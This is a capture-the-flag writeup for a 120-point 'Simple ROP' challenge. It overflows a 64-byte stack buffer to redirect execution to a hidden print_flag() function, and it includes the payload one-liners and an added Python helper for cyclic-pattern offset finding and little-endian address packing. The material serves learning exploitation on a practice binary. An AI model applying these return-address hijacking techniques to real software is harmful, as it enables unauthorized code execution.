# Simple ROP - 120 Points
###### Writeup by VoidMercy from phsst
We were given a binary and its source code. The relevant part of the source is:
```c
int main(int argc, char *argv[])
{
    /* excerpt as quoted in the writeup; the declaration of buff and the
       unbounded read into it are not shown here */
    gid_t gid = getegid();
    setresgid(gid, gid, gid);          /* run with the group that can read the flag */
    printf("You said: %s\n", buff);    /* buff is the 64-byte stack buffer we overflow */
}
```
As the problem name suggests, this is a problem that uses ROP. The source also contains a function print_flag() that is never called, so all we have to do is redirect execution to it. First we get its address from the disassembly:
```bash
objdump -d simplerop | grep "print_flag"
```
The label line in the output gives the address of print_flag: 0x804851a
Then we have to find the number of bytes between the start of buff and the saved return address, because overwriting the return address is what gives us control of eip. After that padding we append the address of print_flag() in little-endian byte order (the four bytes reversed, one hex pair at a time: 0x0804851a becomes \x1a\x85\x04\x08), and pipe the input through python so the non-printable bytes can be written.
```bash
python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop   # NO SEG FAULT: 68 bytes does not even reach the saved ebp
python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop   # GOT THE FLAG: 64-byte buffer + 8 bytes of alignment padding + 4-byte saved ebp = 76
```
The one-liners are Python 2 syntax: `print` writes the raw bytes followed by a newline, which is harmless here. 76 is a common offset for a 64-byte array because the compiler pads the frame for stack alignment before the saved ebp.
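The offsets above were found by guessing (64, then 76). As an added example, not part of the original writeup, here is a small Python 3 helper that does the three steps in a reusable way: it pulls a symbol address out of `objdump -d` output, generates a cyclic pattern so the offset to the return address can be read straight from the value that lands in eip under a debugger, and packs the address little-endian with `struct` instead of hand-reversing hex pairs. The objdump lines embedded below are constructed for the example (the print_flag address 0x804851a is the one from the writeup); the eip value used in the usage note is what the cyclic pattern would produce at offset 76, not something captured from the real binary.

```python
import re
import struct
import string
import sys

# --- 1. symbol address from `objdump -d` output -------------------------------
# objdump prints a function label as "0804851a <print_flag>:" before its body.
OBJDUMP_LABEL = re.compile(r"^([0-9a-fA-F]+)\s+<([^>]+)>:")

def symbol_address(objdump_output: str, name: str) -> int:
    """Return the address of `name` from the text of `objdump -d`."""
    for line in objdump_output.splitlines():
        m = OBJDUMP_LABEL.match(line)
        if m and m.group(2) == name:
            return int(m.group(1), 16)
    raise KeyError(f"symbol {name!r} not found in objdump output")

# --- 2. cyclic pattern for locating the return-address offset -----------------
# Metasploit-style pattern: every 4-byte window is unique for the first 20280 bytes,
# so the bytes that end up in eip identify exactly where they came from.
PATTERN_MAX = 26 * 26 * 10 * 3  # 20280

def pattern_create(length: int) -> bytes:
    if length > PATTERN_MAX:
        raise ValueError(f"pattern longer than {PATTERN_MAX} bytes is not unique")
    chunks = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks)[:length].encode()

def pattern_offset(eip_value) -> int:
    """Given eip as an int (as gdb shows it) or 4 raw bytes, return the offset."""
    needle = struct.pack("<I", eip_value) if isinstance(eip_value, int) else eip_value
    idx = pattern_create(PATTERN_MAX).find(needle)
    if idx < 0:
        raise ValueError("value does not occur in the pattern")
    return idx

# --- 3. payload construction --------------------------------------------------
def p32(value: int) -> bytes:
    """Pack a 32-bit address little-endian, e.g. 0x0804851a -> b'\\x1a\\x85\\x04\\x08'."""
    return struct.pack("<I", value)

def build_payload(offset: int, ret_addr: int, filler: bytes = b"A") -> bytes:
    """`offset` filler bytes up to the saved return address, then the new return address."""
    return filler * offset + p32(ret_addr)

# Constructed sample of what `objdump -d simplerop` prints for the target function.
SAMPLE_OBJDUMP = """\
0804851a <print_flag>:
 804851a:\t55                   \tpush   %ebp
 804851b:\t89 e5                \tmov    %esp,%ebp
"""

if __name__ == "__main__":
    target = symbol_address(SAMPLE_OBJDUMP, "print_flag")
    # Usage: pipe the payload into the binary, e.g. `python3 rop_payload.py | ./simple-rop`
    sys.stdout.buffer.write(build_payload(76, target) + b"\n")
```

To find the offset instead of guessing it, feed `pattern_create(200)` to the binary under gdb and pass the faulting eip value to `pattern_offset`: for this pattern, eip reading 0x63413563 (the bytes "c5Ac") means the return address sits at offset 76, which matches the writeup's result.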